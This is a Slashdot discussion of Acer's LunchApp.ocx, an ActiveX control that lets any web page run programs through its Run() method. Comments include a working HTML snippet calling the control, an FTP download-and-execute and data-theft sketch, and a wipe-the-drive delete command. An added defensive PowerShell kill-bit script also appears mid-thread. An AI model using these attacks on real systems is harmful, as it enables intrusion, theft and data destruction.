Acer May Be Bugging Computers

Zonk posted more than 7 years ago | from the might-want-to-look-into-this dept.

Privacy 396

tomjen writes "What if a well known laptop company had silently placed an ActiveX Control on their computers that allowed any webpage to execute any program? Well Acer apparently has and they have (based on the last modified-by date of the file) been doing this since 1998. 'Checking the interface of the control reveals it has a method named "Run()" as shown below. The method supports parameters "Drive", "FileName", and "CmdLine". Isn't it strange for a control that's marked "safe for scripting" to allow a method that is suggestive of possible abuse?'"

396 comments

Aren't we a little late on this story? (0, Informative)

Anonymous Coward | more than 7 years ago | (#17504708)

Change Log
2006-11-19 - Public Release.

Phew! (1, Interesting)

gardyloo (512791) | more than 7 years ago | (#17504720)

Typing this on an Acer laptop. Sure glad I wiped the thing immediately and put linux on. So far I've really liked the laptop, but Acer is one company which gives you "restore" DVDs which contain a disk image and which wipe everything else off if you want to use them to reinstall Windows. Hate that.

Re:Phew! (5, Funny)

BrainInAJar (584756) | more than 7 years ago | (#17504736)

Mine shipped with Linux, which I immediately wiped & installed FreeBSD, but I appreciate the thought

Re:Phew! (5, Funny)

gardyloo (512791) | more than 7 years ago | (#17504760)

Haha. I was just joking. I actually use mine by drilling through the case, and making and breaking a couple of connections between the motherboard and three "C" cells hooked in series with paperclips. Manually, beeyotch. Real men type in raw binary without the keyboard. But I appreciate the thought.

Re:Phew! (-1, Troll)

shoolz (752000) | more than 7 years ago | (#17504904)

I await the day when Linux is so ubiquitous that lusers like you are waving your dicks about how many Windows b0xen you have in your netw0rk. STFU. We've heard it before.

Re:Phew! (1)

Kadin2048 (468275) | more than 7 years ago | (#17505028)

Just out of curiosity, where did you get it pre-installed with Linux? And would you recommend wherever you bought it from?

I'm still hoping that Lenovo will see the light and sell ThinkPads (or whatever they're calling them these days) without Windows; I never could get a bare one from IBM, and there was always just something galling about buying software that I don't want to use.

Re:Phew! (4, Interesting)

BrainInAJar (584756) | more than 7 years ago | (#17505232)

There was a local computer store in town that was selling them, and apparently Acer shipped them to the store with Linux preinstalled. Some strange Chinese distro I'd never heard of... I'd recommend the laptop, yeah... Served me well so far... warranty just expired and I've had no need to use it.

and no, I wasn't going for humour mods... my laptop actually shipped with Linux, and I did wipe it for FreeBSD (it runs OpenSolaris now, but that's beyond the point).

Re:Phew! (4, Informative)

belmolis (702863) | more than 7 years ago | (#17505344)

I recently bought a laptop with Ubuntu pre-installed from The Linux Store [thelinuxstore.ca], which is in Ontario. I've been perfectly satisfied aside from the minor point that they only offer the choice of Ubuntu and Fedora Core when I would have preferred Debian.

Re:Phew! (2, Informative)

GFLPraxis (745118) | more than 7 years ago | (#17504746)

It's a good thing...Other companies like HP and Sony no longer include restore disks, so when a Windows user gets a virus that messes some system files up, they have to pay ridiculous amounts to order restore disks if they didn't remember to do it themselves.

Re:Phew! (3, Informative)

mallardtheduck (760315) | more than 7 years ago | (#17504786)

My HP notebook, bought about 15 months ago not only came with restore disks, but a plain Windows XP SP2 disk and disks for WinDVD and Sonic's CD recording software.

I don't know about SONY, but in my experience, HP are more generous than most in terms of disks included with their PCs.

Re:Phew! (1)

jellie (949898) | more than 7 years ago | (#17505288)

Did you buy this in the US? I bought an HP desktop 3 years ago and I was surprised that it came with no disks (I hadn't purchased a computer in a while before that), so I even called them and asked. Nope, they weren't going to give me CDs. Just burn the recovery CDs, they said. So I did, and I have never used them.

I bought a Compaq laptop 7 months ago. It didn't come with anything. I installed vanilla XP2 on it and then had to spend an hour chatting with their tech support because their useless website didn't have modem and sound drivers.

This time I just built my own PC.

Re:Phew! (-1, Flamebait)

Le Marteau (206396) | more than 7 years ago | (#17504820)

ridiculous amounts to order restore disks if they didn't remember to do it themselves

What, are you working as a WalMart greeter, or still living in your mama's basement?

"ridiculous?" Well, yeah, if you're used to getting everything for free. Hundred bucks or so for an XP 'upgrade' if you have some previous disc.

Whoop-de-fricken' do. I'll get over it. I pretty much expect I gotta buy a license, whenever I buy a new box. Hundred bucks. "ridiculous". Hate to hang with you, you cheap bastard. I spend a hundred bucks on dinner sometimes, and that's just for me, not including the babe or the vino. Sheesh.

Re:Phew! (0, Troll)

ResidntGeek (772730) | more than 7 years ago | (#17504832)

And I'm sure you have no problem being the reason everyone hates Americans. Other people try not to be like that.

Re:Phew! (5, Funny)

pboulang (16954) | more than 7 years ago | (#17504880)

I spend a hundred bucks on dinner sometimes, and that's just for me, not including the babe or the vino. Sheesh.
Do you have to pay for the babe by the hour or is it a flat rate?

Re:Phew! (0)

Anonymous Coward | more than 7 years ago | (#17505202)

If she's flat, she ain't interesting.

Re:Phew! (1, Informative)

aauu (46157) | more than 7 years ago | (#17504848)

I bought an HP core 2 duo media center pc back in September. Came with all the software in a special partition on the first hard drive. HP has online option to purchase restore dvds for $17 (shipping). Bought the disks just because I could. I have been running Vista RC2 on this computer and do not intend to go back. Vista is much more responsive than XP. One minor annoyance is that serial ports are no longer part of computer systems these days. I need to hook up a device that only supports serial not usb. Not all vendors are in this decade.

Re:Phew! (3, Informative)

phalse phace (454635) | more than 7 years ago | (#17505078)

Don't know about you, but I wouldn't call $20 a ridiculous amount to pay for a set of restore disks. And you can avoid paying the $20 or so by burning your own set of restore disks... my HP notebook prompted me to do so when I first turned it on. It just burns an image of the restore partition on the C: drive. If you forget or decide you want to do it later, it will/can remind you again in a couple days or so.

Re:Phew! (3, Informative)

Propaganda13 (312548) | more than 7 years ago | (#17505366)

Corrupt that extra partition and see how far that "restore" disk gets you. It's not the regular Windows restore disk that used to come with computers and it's definitely not a Windows disk. It won't work without the data on the partition.

$20 for the set of disks + $52.50(Dell refunded price for Windows) is about the same price you could buy Windows XP Home OEM version for.

Re:Phew! (2, Insightful)

east coast (590680) | more than 7 years ago | (#17504792)

you're missing the point. what happens on the day that they start putting out linux and simply "make things easier for the end user" by circumventing some common sense security measures?

And now that it's publicized... (4, Interesting)

mallardtheduck (760315) | more than 7 years ago | (#17504740)

I expect exploits for this to start appearing within days, if not hours...

Re:And now that it's publicized... (3, Interesting)

aauu (46157) | more than 7 years ago | (#17504768)

Isn't there a $50,000 bounty on vista capable exploits? slashdot announces ..... Profit $$$$

Re:And now that it's publicized... (1)

FractalZone (950570) | more than 7 years ago | (#17504790)

Real Computers are not made by Du^Hell or Acer.

Re:And now that it's publicized... (5, Funny)

Joebert (946227) | more than 7 years ago | (#17505024)

Exactly, they're made by the Tooth Fairy & the Easter Bunny with the help of Santa's elves during their offseasons.

Re:And now that it's publicized... (1)

sidb (530400) | more than 7 years ago | (#17504966)

You seem to have omitted step 2. Could you please clarify what it was?

Re:And now that it's publicized... (2, Insightful)

Bargearse (68504) | more than 7 years ago | (#17505280)

I doubt it would be eligible for a bounty, as it won't run under Vista's default configuration. It can be made to run though :)

Re:And now that it's publicized... (1)

plover (150551) | more than 7 years ago | (#17504806)

Well, I just googled for the class ID, but didn't find anything other than links to this vulnerability warning. But I don't know if Google will index attributes inside of <object> tags.

Re:And now that it's publicized... (5, Informative)

Ninwa (583633) | more than 7 years ago | (#17505038)

The class-id was in the article :-) D9998BD0-7957-11D2-8FED-00606730D3AA

Re:And now that it's publicized... (1)

Joebert (946227) | more than 7 years ago | (#17505050)

Try searching for the Flash CLSID.
d27cdb6e-ae6d-11cf-96b8-444553540000

Oops! Nothing like bad publicity.. (1)

msimm (580077) | more than 7 years ago | (#17504930)

To keep corporations playing on the (more or less) straight and narrow.

Re:And now that it's publicized... (0)

codepunk (167897) | more than 7 years ago | (#17504968)

Give me the clsid of the control and method name and I can hook you up in about 45 seconds.

Uhh, there already IS an exploit... (5, Informative)

nweaver (113078) | more than 7 years ago | (#17504978)

Read the article: There's a trivial piece of example "exploit" code running calc.exe.

But as you can run ANY windows binary with any command line (at least according to the article), actual exploitation is trivial.

Re:And now that it's publicized... (1)

dlanod (979538) | more than 7 years ago | (#17505146)

Considering it's present on my one year old Australian Acer, I'd say it's very very ripe for abuse.

present on Aspire 1690 (2, Informative)

Phil246 (803464) | more than 7 years ago | (#17504766)

Checked mine, it's present :( Anyone know if it's safe to make that file and its registry entry 'disappear' ?

Safe (2, Informative)

twitter (104583) | more than 7 years ago | (#17504858)

Checked mine, it's present :( Anyone know if it's safe to make that file and its registry entry 'disappear' ?

Sure, just go get the Mepis Patch [mepis.org]. This will end all of your activeX problems. It won't end your Flash, Adobe and other problems but those are minor in comparison.

Really, do you think eliminating this one control will make your computer safe? Chances are there are copies that will "respawn" later, a common malware trick, and that there are far nastier controls you don't know about. The malice is built in from Redmond before anyone else gets it.

Wow (2)

willyhill (965620) | more than 7 years ago | (#17504946)

The malice is built in from Redmond before anyone else gets it.

Are you really suggesting this is Microsoft's fault?

Re:Wow (1, Insightful)

codepunk (167897) | more than 7 years ago | (#17505084)

Well considering they are the creators of the almighty active x control that allows unsafe code execution in a browser, I would say yes he is suggesting that.

And he would be absolutely correct, well acer is not exactly off the hook here either.

@mozilla.org/process/util;1 (3, Informative)

MushMouth (5650) | more than 7 years ago | (#17505244)

Any mozilla extension (chrome) on mozilla/thunderbird/seamonkey/firefox/camino has access to this component which can run anything the user can.

Re:Wow (2, Insightful)

willyhill (965620) | more than 7 years ago | (#17505246)

I love that someone modded you up. So, if I give you a box of matches and you set fire to your house on purpose, you'd blame me? Kind of like people who pour hot coffee on themselves and file a lawsuit for a million bucks, right?

acer is not exactly off the hook here either.

That's an interesting way to put it. But I guess that's the only way to rationalize it if you were desperate enough to pin this on Microsoft for some reason.

Re:Safe (1)

Phil246 (803464) | more than 7 years ago | (#17504958)

No, but it will make it safer (if only a little) than leaving it there.
I've set its kill bit in the meantime though
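
The kill-bit mitigation mentioned in the comment above, shown as an added example that is not part of the original thread and is not Acer's or Microsoft's own code. It reports whether the control with the class ID quoted in the thread is registered and marked safe for scripting, then sets the Internet Explorer kill bit for it; the function names are hypothetical, and an elevated 64-bit PowerShell session is assumed.

```powershell
# Added example: audit one ActiveX control and set its Internet Explorer kill bit.
# Run elevated; the kill bit is written under HKEY_LOCAL_MACHINE.

$Clsid = '{D9998BD0-7957-11D2-8FED-00606730D3AA}'      # class ID quoted in the thread
# CATID_SafeForScripting: category a control lists to declare itself safe for scripting.
$SafeForScripting = '{7DD95801-9882-11CF-9FA9-00AA006C163B}'
$KillBit = 0x400                                        # "Compatibility Flags" kill-bit value
$CompatSubKey = 'Microsoft\Internet Explorer\ActiveX Compatibility'

function Get-CompatRoots {
    # 32-bit Internet Explorer on 64-bit Windows reads the Wow6432Node view, so cover both.
    $roots = @("HKLM:\SOFTWARE\$CompatSubKey")
    if (Test-Path -Path 'HKLM:\SOFTWARE\Wow6432Node') {
        $roots += "HKLM:\SOFTWARE\Wow6432Node\$CompatSubKey"
    }
    return $roots
}

function Get-CompatFlags {
    param([string]$Key)
    if (-not (Test-Path -Path $Key)) { return 0 }
    $value = (Get-Item -Path $Key).GetValue('Compatibility Flags')
    if ($null -eq $value) { return 0 }
    return [int]$value
}

function Get-ControlStatus {
    param([string]$Id = $Clsid)
    # A 32-bit control on 64-bit Windows registers under the Wow6432Node view of HKCR.
    $classKeys = @("Registry::HKEY_CLASSES_ROOT\CLSID\$Id",
                   "Registry::HKEY_CLASSES_ROOT\Wow6432Node\CLSID\$Id") |
                 Where-Object { Test-Path -Path $_ }
    $server = $null
    $scriptSafe = $false
    foreach ($key in $classKeys) {
        if (Test-Path -Path "$key\InprocServer32") {
            # The default value of InprocServer32 is the path of the .ocx/.dll on disk.
            $server = (Get-Item -Path "$key\InprocServer32").GetValue('')
        }
        # A control can also claim script safety at run time through IObjectSafety,
        # so $false here does not prove the control is unscriptable.
        if (Test-Path -Path "$key\Implemented Categories\$SafeForScripting") {
            $scriptSafe = $true
        }
    }
    # Report the kill bit as set only if every registry view carries it.
    $killed = $true
    foreach ($root in (Get-CompatRoots)) {
        $flags = Get-CompatFlags (Join-Path $root $Id)
        if (($flags -band $KillBit) -eq 0) { $killed = $false }
    }
    [pscustomobject]@{
        Clsid            = $Id
        Registered       = [bool]$classKeys
        ServerPath       = $server
        SafeForScripting = $scriptSafe
        KillBitSet       = $killed
    }
}

function Set-KillBit {
    param([string]$Id = $Clsid)
    foreach ($root in (Get-CompatRoots)) {
        $key = Join-Path $root $Id
        if (-not (Test-Path -Path $key)) { New-Item -Path $key -Force | Out-Null }
        # OR the bit in so compatibility flags that are already present are preserved.
        $flags = (Get-CompatFlags $key) -bor $KillBit
        New-ItemProperty -Path $key -Name 'Compatibility Flags' -PropertyType DWord `
            -Value $flags -Force | Out-Null
    }
}

$status = Get-ControlStatus
$status | Format-List
if ($status.Registered -and -not $status.KillBitSet) {
    Set-KillBit
    Get-ControlStatus | Format-List      # confirm KillBitSet is now True
}
```

The kill bit tells Internet Explorer not to instantiate the class ID even if the file is registered again later, so it complements the `regsvr32 -u` removal suggested elsewhere in the thread.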

Re:Safe (1)

twitter (104583) | more than 7 years ago | (#17505252)

No, but it will make it safer (if only a little) than leaving it there. I've set its kill bit in the meantime though

Good luck.

Re:present on Aspire 1690 (5, Informative)

valeurnutritive (1048314) | more than 7 years ago | (#17504954)

To remove this from your machine.

Go to Start > Run and type:
regsvr32 -u lunchapp.ocx

(-u for uninstall)

Re:present on Aspire 1690 (1)

Teddy_Roosevelt (757045) | more than 7 years ago | (#17505308)

To remove this from your machine.

Go to Start > Run and type:
regsvr32 -u lunchapp.ocx

(-u for uninstall)


Why not just create a website that will use this vulnerability to run this "unregister" command on our machines and eliminate the vulnerability? It would be a nice public service.

Re: Not present on my Aspire 5024 (1)

Bootvis (913169) | more than 7 years ago | (#17505240)

It's not present on the Aspire 5024 WLMI. Disclaimer: Could be because I removed some Acer-stuff.

Acer Aspire 3624WXMI (0)

Anonymous Coward | more than 7 years ago | (#17504774)

I did a search file for LUNCHAPP.OCX on my Acer Aspire 3624WXMI and found none.

The 4th USB port (3, Interesting)

wikinerd (809585) | more than 7 years ago | (#17504782)

I once bought a Fujitsu-Siemens laptop with 3 USB ports, but when I opened it I noticed it had a non-visible 4th USB port near the hard disk that you needed a screwdriver in order to access. No mention of it in Fujitsu-Siemens' manuals and other documentation that I got with the laptop, and no mention of it on their website. Although visually hidden, the port was visible via diagnostics software. I thought that this could be one way to put a spy antenna or other device on a laptop (a USB port provides 500mA of power which is enough to power a large range of antennas and electronics). It could be used to put an anti-theft antenna revealing the laptop's location, to put a keylogger, or to put a backup device. In the end I just put a permanent flash key drive in it so I had a laptop with permanent flash storage in addition to the hard disk.

Re:The 4th USB port (4, Insightful)

mallardtheduck (760315) | more than 7 years ago | (#17504844)

Could just be there for optional "built-in" bluetooth or Wifi. A USB module is probably cheaper than a Mini-PCI.
Plus, if they do no wireless, Wifi-only and Wifi+BT models, with a single Mini-PCI slot, they would need both Wifi and Wifi+BT cards, if they have a "hidden" USB port, they only need to stock Wifi mini-PCI cards and USB bluetooth adapters, the same adapters that are sold independently.

Re:The 4th USB port (2, Insightful)

starwed (735423) | more than 7 years ago | (#17504872)

When I bought a USB2 PCI card for my desktop, most models had a single internal USB port as well as all the external ones. I think this is pretty common, and nothing nefarious.

It's an appendix. (4, Interesting)

Kadin2048 (468275) | more than 7 years ago | (#17505076)

I think a lot of computers have internal ports that were put in there as part of the original board design, but were never taken advantage of during configuration or subsequent system design.

In an old Mac of mine (G4 "Sawtooth"), there is an internal Firewire port right on the motherboard, even though there are virtually no (to my knowledge anyway) internal Firewire devices available. The most useful thing you can do with it is run it out to a dummy card-slot panel and give yourself an extra external port. (I suppose you could also run another HD by using a IDE to FW converter card, if you could find a small enough one.)

It's there, I suspect, because when they were designing that mobo, it wasn't clear that Firewire would be used primarily for DV and external peripherals, and wouldn't become the internal-peripheral interconnect of choice. For all the designers knew, Firewire could have become like SATA is today, with hard drives being built for it natively. In that case, having one inside the case could be useful as hell (particularly since that machine has space for 4 or 6 internal 3.5" HDs and 2 removable-media drives). They had no way of knowing that it would end up being the electronics version of an appendix.

I suspect if you were to look around closely at the first generations of a lot of technologies, you'd find a lot of things like this; design decisions made for possibilities that just didn't pan out, but were left there anyway.

Re:The 4th USB port (1)

dreamlax (981973) | more than 7 years ago | (#17505212)

I fix laptops for Toshiba for a living . . . and it is not uncommon for USB ports to be found inside. The most common case for Toshiba laptops is the fingerprint reader, it doesn't connect with an actual "USB plug" but a 4-line ribbon wire which slotted and bracketed into a tiny slot on the motherboard. The device uses the USB standard in terms of data transfer, probably because it makes the software easier to implement as well.

You'll probably find that it is a similar case for your laptop. If there is a "built-in" device in your laptop that can be controlled via software, it is probably a USB device.

So can this be neutralized? (1)

Toddlerbob (705732) | more than 7 years ago | (#17504798)

Is there simply a file I can delete to fix this? I got an Acer desktop for my sister, and I'd like to tell her what to delete to get rid of this threat.

Re:So can this be neutralized? (2, Informative)

plover (150551) | more than 7 years ago | (#17504900)

Click Start/Run, then in the box type this:

del c:\windows\system\lunchapp.ocx
That will delete the object itself.

Re:So can this be neutralized? (2, Informative)

Lehk228 (705449) | more than 7 years ago | (#17505092)

run regsvr32 -u lunchapp.ocx from start>run it will unload it without having to edit the registry

Re:So can this be neutralized? (1)

Wanon (808109) | more than 7 years ago | (#17505358)

Uninstall itself! http://wanon.bur.st/uninstall.html [wanon.bur.st]

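<html>
<body>
<!-- Loads the LunchApp control by class ID and calls its Run() method to unregister the control itself -->
<object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3AA" id="hahaha">
</object>
<script>
hahaha.Run("c", "\\windows\\system32\\regsvr32.exe", "-u lunchapp.ocx");
</script>
</body>
</html>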

Isn't it a little bit naive (2, Interesting)

zappepcs (820751) | more than 7 years ago | (#17504814)

to think that Acer and others have not been doing this for years? Put on the tin foil hat now, they may be doing so in conjunction with governments. Let's not stop there, your ISP and phone company might also be doing the same thing?

I bet that buried in the EULA somewhere is a statement about remote support or some other such thing that would negate any complaints about this code as far as culpability goes. Wonder what they will do now that the botnet boys know it's there? Just one more reason that people who want to have a safe computer should learn how to administer one properly... IMO.

Re:Isn't it a little bit naive (2, Insightful)

Telvin_3d (855514) | more than 7 years ago | (#17504892)

While I agree with you in general paranoid principle, I think the last bit is a little naive. It's like saying that if you want to have a safe house, you should be able to build your own in order to make sure there is no secret explode-on-remote-command hardware installed. Yes, people need to pay a little attention, but this type of shit is above and beyond anything that should be expected.

P.S. I want to see Holmes on Homes run across a secret explode-on-remote-command thing in an episode. That would make my week.

Re:Isn't it a little bit naive (2, Interesting)

zappepcs (820751) | more than 7 years ago | (#17505068)

I was thinking that 'meh, Telvin is probably right' but I thought about it again. Not to take an opportunity to diss you or anyone, but rather to explain my point a bit better.

Anyone, almost, can get a license to drive a car. The few that will put power steering fluid in their oil because they know nothing about cars will learn a very expensive lesson. There are many examples here where just a grounding of common sense would save people from very costly and perhaps embarrassing episodes. There are awards everywhere for people that do very stupid things such as the Darwin awards. The evidence of my point is all around us, but for some reason people think that technology should simply work as simple as a toaster. Those same people forget to think about all the people that put pop-tarts in the toaster with the wrapper still on, or worse, put them in the microwave.. resulting in the required shower of sparks. All of the technology around us is capable of doing things the wrong way. It is only through common experience and learning that most people manage to not fsck things up. At this point I should say how very glad I am that people are not wont to buy their own table saw or jack hammer. These can do way more damage than a George Foreman grill mixed with some Jack Daniels. I still worry every time they allow the sale of fireworks to joe public.

Even people who are only mildly aware of how a vehicle works are usually able to determine that something is wrong because its making a new sound, or not steering right etc. This is not so with computers. People are so perplexed at how complex it must be that they remain clueless as to what might be wrong when it stops working as well as it seemed that it used to work.

Some people think that all emails they get should be opened, and out of curiosity, they open nearly every attachment they receive under the mistaken notion that their ISP or AV software is going to protect them.

Perhaps they need not know how to administer a Windows network, but they should have some clues, like they have with almost every other kind of technology they use. BTW, yes, I believe that everyone who has a flashing 12:00 on their VCR/DVD player should be fined until they know how to fix it. I also think I should be able to sell them clocks that never need to be set... but that is an open market forces kind of thing. The flashing clock doesn't really hurt anyone while allowing a botnet to p0wn your machine does. If there is a license to make sure only responsible drivers are on public roads, perhaps we need something similar for computer users. There are certification programs that people can take. It's just common sense that I think they need, not the ability to rewrite the kernel.

Hopefully that clears up what I meant to say?

to those of us uneducated (1, Interesting)

Anonymous Coward | more than 7 years ago | (#17504824)

Please give examples or something of how this could be used for ill purposes. Yes, I realize it is obvious to most people but I'm a beginner. I do not know what harm can come of the power, in and of itself, of being able to run a program that is already on computer. Would one, through this particular acer thing, be able to pass things to that program and then have that program in turn do other bad things or what? Please give rudimentary examples.

Re:to those of us uneducated (5, Informative)

Anonymous Coward | more than 7 years ago | (#17504866)

Please give examples or something of how this could be used for ill purposes. Yes, I realize it is obvious to most people but I'm a beginner. I do not know what harm can come of the power, in and of itself, of being able to run a program that is already on computer. Would one, through this particular acer thing, be able to pass things to that program and then have that program in turn do other bad things or what? Please give rudimentary examples.
One could, for example, use the Windows ftp.exe client to download an arbitrary program (e.g. botnet software) and then execute it. I'm certain there are even better ways to do it but this one could work well enough to completely take over the machine.

Re:to those of us uneducated (1)

Lehk228 (705449) | more than 7 years ago | (#17505100)

could also use the windows FTP command to upload data from the hard drive such as cookies or excel spreadsheets etc.

Re:to those of us uneducated (3, Informative)

codepunk (167897) | more than 7 years ago | (#17504922)

I have not seen the control or have a copy of it but it can be as simple as a couple of lines of script in a web page. Now I can possibly own most Acer laptops visiting that page.

The script could do something like this
ftp somehost
ftp get somefile
execute somefile

Bingo I own your laptop.

Or say I just ftp your firefox data so I can grab your history, passwords etc.

Re:to those of us uneducated (1)

2ms (232331) | more than 7 years ago | (#17505052)

Windows has in-built ftp? This script is able to pass that much info (like url and sequence of app launching/operation commands)?

Re:to those of us uneducated (2, Informative)

codepunk (167897) | more than 7 years ago | (#17505106)

You bet. Open up a command window and type ftp and you will notice that it has a built-in ftp client. Simply call the run method on this control in a script and you can run anything you want, download or upload anything you want, just by the client browsing a web page.

Re:to those of us uneducated (0)

Anonymous Coward | more than 7 years ago | (#17505112)

Yes, there is a commandline application called 'ftp' shipped with Windows.

Re:to those of us uneducated (0)

Anonymous Coward | more than 7 years ago | (#17505174)

It's a really flaky and unreliable FTP program but yes, it's been there forever.

Re:to those of us uneducated (0)

Anonymous Coward | more than 7 years ago | (#17505006)

RTFA, he provides an example that opens up calc.exe

Re:to those of us uneducated (4, Interesting)

djupedal (584558) | more than 7 years ago | (#17505046)

"Please give examples or something of how this could be used for ill purposes. Yes, I realize it is obvious to most people but I'm a beginner."

A beginner & an AC - wants to know exactly how to execute the 'bad thing', and promises not to inhale :)

Oh...rudimentary...well, that's different. Since Acer would presumably have the power to control any aspect of your computer when you use it to log onto any webpage, all they need to do is to wait for you to access a site under their control, and bingo, they can lift all of your installation logs, cookies, saved passwords, MS WORD docs containing the words 'budget; personal; finance; medical; records; debt; sex, SSN' (and all applicable variants), etc.

OK, let's say you are gullible enough to think that they can take all of that they want, and still not put you at risk - now, think for just a moment about who 'they' are...? What are the odds of 'they' going to all that trouble and not having some plan to do something with what they glean that you will not be pleased with...? Still not impressed?

How's this... Acer sits around and waits for just the right time and boom - they toggle a flag on your computer that makes it appear that it needs to have XYZ repaired, and what do you know, the only resource is...ACER!!

A new age variation on the old water-bag trick. One guy owned two service stations. One station was the last stop before heading out of LA, into the desert, heading for Palm Springs. The other was the last service station before heading out of Palm Springs, out across the desert, heading for LA. When a car stops on the LA side, the station staff sell the unaware traveler a scary story about being in the desert and having the car break down from overheating. Seems, tho, if you buy a canvas water-bag filled with water, and hang it on your car's front grille, it will supposedly help cool the air before it flows across the radiator. Best insurance money can buy. Thank ya now, ya'll have a safe trip! :)

Problem is, that big 'ol canvas bag actually blocks the airflow, and by the time you get near the other side of the desert, your car overheats and you have to pay the Palm Springs service station to come and tow your car and fix everything that broke from overheating. Not a small fee, even in those days. They explain how the bag is what did the damage, and the hapless owner tells them to keep it.

What do you think the Palm Springs service station guys do with the demon water-bag? Well, of course, they sell it to the next dupe going from there to LA, and even help by attaching it to the grille of his car. Thank ya now, ya'll have a safe trip! :)

I figure that one bag most likely made dozens of round trips across the Mohave, and put at least two generations of kids thru law school :)

Rumor has it owning those two stations was the fastest way to retirement until the big casinos came in and the real pocket-picking took off.

Re:to those of us uneducated (1)

nacturation (646836) | more than 7 years ago | (#17505374)

A new age variation on the old water-bag trick. One guy owned two service stations. One station was the last stop before heading out of LA, into the desert, heading for Palm Springs. The other was the last service station before heading out of Palm Springs, out across the desert, heading for LA.
Sounds rather apocryphal. However, taken in the same way as Aesop's Fables, it's a good story nonetheless.
 

Re:to those of us uneducated (0, Redundant)

fabs64 (657132) | more than 7 years ago | (#17505048)

Seeing that no one gave you a suitably chilling example of what can be done with already installed programs...

del /F /S /Q c:\* (probably wrong, not good with windows commands but this should delete everything under c:\)

Lessons learned... (5, Insightful)

Anonymous Coward | more than 7 years ago | (#17504882)

1) Whenever possible, build your own.

2) When you can't build your own (laptops), *always* re-install your OS after purchasing a new computer, and for God's sake use a real install CD and not the recovery one provided by the manufacturer.

cvrsd;lk.a5df.a,pfll; (2, Funny)

Tablizer (95088) | more than 7 years ago | (#17504886)

Can't...get...back...contr...Everything is Fine and Happy. Nothing to Worry About. Have a Nice Day!
     

LunchApp.ocx (5, Funny)

snicho99 (984884) | more than 7 years ago | (#17504912)

Don't panic. It's not a method for launching applications.

The original article failed to notice that it's a Lunch application. It's actually a throwback to when Acer briefly partnered up with 180solutions to deliver targeted pop-under sandwiches to hungry laptop owners. The idea being that after seventeen hours of trying to uninstall Bonsai Buddy the computer user would be debilitated through starvation and susceptible receptive to sp(iced h)am.

The program was abandoned when Acer's engineers failed to perfect the wasabi-over-ip protocol - leaving the whole system unreliable and prone to bagel overrun.

SWAH!?! (4, Funny)

foo fighter (151863) | more than 7 years ago | (#17504948)

This news is unbelievable.

Acer still makes computers? People still buy them?

I remember Acer being a budget brand with a bad rep for quality and customer service back in the mid- to late-90s. I can't believe they are still a going concern.
 

Re:SWAH!?! (0)

Anonymous Coward | more than 7 years ago | (#17505096)

at least they don't have exploding batteries.

Re:SWAH!?! (1)

pchan- (118053) | more than 7 years ago | (#17505176)

Acer is the number 4 maker of personal (i.e., non-server) computers in the world, behind HP, Dell, and Lenovo and ahead of Apple. At least that's what the statistics say; I've yet to see anyone using an Acer.

Re:SWAH!?! (1)

BrainInAJar (584756) | more than 7 years ago | (#17505208)

I've yet to see anyone using an Acer.

Look harder?
Every other laptop I see these days is an Acer. Hell, I'm on an Acer right now (the Aspire series run Solaris fantastically).
Quality's not bad on them these days and they're about half the price of the exact same laptop rebranded (Toshiba made a line of laptops that had the same hardware, including case, as the Aspires; I imagine they were just rebrands).

Easy fix for this problem (2, Insightful)

Shadyman (939863) | more than 7 years ago | (#17505032)

1. Format your hard disk
2. Install Linux
3. Return your Windows for a refund (Profit!)

Re:Easy fix for this problem (2, Insightful)

black hole sun (850775) | more than 7 years ago | (#17505284)

Of course simply deleting the file in question is just way too off-the-wall for most users.

"Pre-hosed" -- always wipe it (4, Interesting)

mlts (1038732) | more than 7 years ago | (#17505082)

On all new computers, be they PCs, Suns, RS/6000s, or anything, after getting the machine out of the box and plugged in, I tar (or ghost in the case of PC recovery partitions) off anything preinstalled to two backups, then format the hard disk (or disks/arrays) on the machine. After the disks are formatted, I then install the OS and drivers and get the machine to the latest patches that I can via CDs. Only after this and a lockdown check does the machine see the network.

I've just seen too many machines come pre-hosed from the factory. For anything that sees production use, I want to pack my own parachute and know exactly what is on the machine.

On PCs, I try to find drivers from the underlying OEM rather than depend on the PC vendor, as usually the PC vendor's drivers tend to be outdated, except for motherboard/system board/IO planar flash.

Who Wudda Thought (1)

BoRegardless (721219) | more than 7 years ago | (#17505102)

Anyone would be that utterly deceptive...I mean...certainly not a manufacturer of hardware...or certainly not a major software developer...uh...oh, I forgot, except for those accidental bugs in the OS software...and indeed the unfortunate BBBBrowser.

Bug this! (0)

Anonymous Coward | more than 7 years ago | (#17505136)

RunLikeFuck()

Aspire Phone Home (1)

CranberryKing (776846) | more than 7 years ago | (#17505164)

No surprise really. Nice little machine but the battery sucks ass. 1 hour average.

What I want is a support/download page that works like allofmp3. A company and site that respects its customers and provides what they want without any BS.

IE7 stops the attack (1)

suv4x4 (956391) | more than 7 years ago | (#17505228)

Notice that in the article if you have IE7 it'll stop the attack since the user will be notified the page executes an unknown ActiveX and ask for permission (in the yellow creeping bar) before doing anything.

Of course IE7 is only at 20% vs IE6 at more than 60%, but still, shows the browser going in the right direction.

I'm not impressed with this IE7 "improvement" (1)

Cafe Alpha (891670) | more than 7 years ago | (#17505304)

The right direction would be running screaming away from active X entirely.

Let me know when Microsoft admits that Active X was a terrible idea and leaves it uninstalled in future versions of the OS.

Re:I'm not impressed with this IE7 "improvement" (2, Informative)

suv4x4 (956391) | more than 7 years ago | (#17505348)

The right direction would be running screaming away from active X entirely.

The hatred towards ActiveX is largely unfounded. What would happen to sites like YouTube or movie sites, video, audio sites, if all browsers are suddenly rendered incapable of supporting plugins?

The mistake of Microsoft was that ActiveX were way too easy to install, and this is corrected in a major way in IE7.
In fact, the plugin API and extensions of Firefox can do just as much damage and much easier (since people trust those) than ActiveX can in IE7, with all default settings.

IE7 will at least ask you now if a page wants to run an *already installed* control. Does Firefox do this? No.

(of course there's the question: should it, but apparently due to jerks that preinstall craps on laptops, yea..)

Blank laptops (very very old story) (2, Interesting)

JHWH (1046444) | more than 7 years ago | (#17505270)

I would say it's time now to force manufacturers/distributors/retailers to provide blank laptops at least as an option.
First, if I have to pay for a preinstalled OS, I cannot be made responsible for that installation. The rescue CD is a kind of responsibility contract.
Second, if I can get a blank PC, I am the one responsible for whatever will run on it without paying extra money.
Third, if I cannot choose, the one who chose on my behalf is to be responsible for whatever happens in my machine for both hw and sw.
So finally, they'd better leave the option to the customer.
And, all this would apply to whatever the OS is, not just the four colours flag OS.

What's this control named "Rootkit" do? (2, Interesting)

Cafe Alpha (891670) | more than 7 years ago | (#17505272)

They named the interface "Run(Drive,FileName,CmdLine)"
